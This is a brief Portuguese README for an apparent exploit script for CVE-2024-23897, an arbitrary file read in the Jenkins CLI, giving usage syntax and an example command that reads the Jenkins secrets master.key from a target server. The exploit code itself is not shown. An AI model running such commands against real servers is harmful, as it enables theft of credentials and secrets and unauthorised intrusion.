
Leitura arbitrária do Jenkins CLI (CVE-2024-23897 aplica-se a versões abaixo de 2.442 e LTS 2.426.3)
Lê as primeiras 3 linhas de qualquer arquivo com permissão de leitura para o usuário atual no sistema. O script está usando proxychains internamente.
Uso:
python CVE-2024-23897.py <jenkins-cli.jar path> <target URI> <file path>
Exemplo:
python CVE-2024-23897.py /mnt/hgfs/Share/jenkins-cli.jar http://10.10.14.8:8080/ /var/lib/jenkins/secrets/master.key